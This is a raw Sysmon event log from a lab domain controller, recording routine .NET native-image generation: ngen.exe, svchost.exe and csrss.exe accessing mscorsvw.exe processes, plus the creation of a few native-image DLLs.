13:21:26.178{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9401-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.147{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9301-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.147{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9301-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.147{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9301-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:26.131{08A6967A-4556-6000-9201-000000009A01}2868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b34-0\TRLParserCOMInterface.dll2021-01-14 13:21:26.131 10341000x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.100{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9201-000000009A01}2868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.100{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9201-000000009A01}2868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.100{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9201-000000009A01}2868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.069{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4556-6000-9101-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.053{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4556-6000-9101-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:26.053{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4556-6000-9101-000000009A01}3148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:26.037{08A6967A-4555-6000-9001-000000009A01}1392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\570-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-14 13:21:26.037 10341000x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.537{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4557-6000-9F01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.522{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4557-6000-9F01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.522{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4557-6000-9F01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.506{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4557-6000-9E01-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.491{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4557-6000-9E01-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.491{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4557-6000-9E01-000000009A01}876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.241{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4557-6000-9D01-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.225{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4557-6000-9D01-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.225{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4557-6000-9D01-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.100{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4557-6000-9C01-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.100{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4557-6000-9C01-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.100{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4557-6000-9C01-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.022{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4557-6000-9B01-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:27.006{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4557-6000-9B01-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 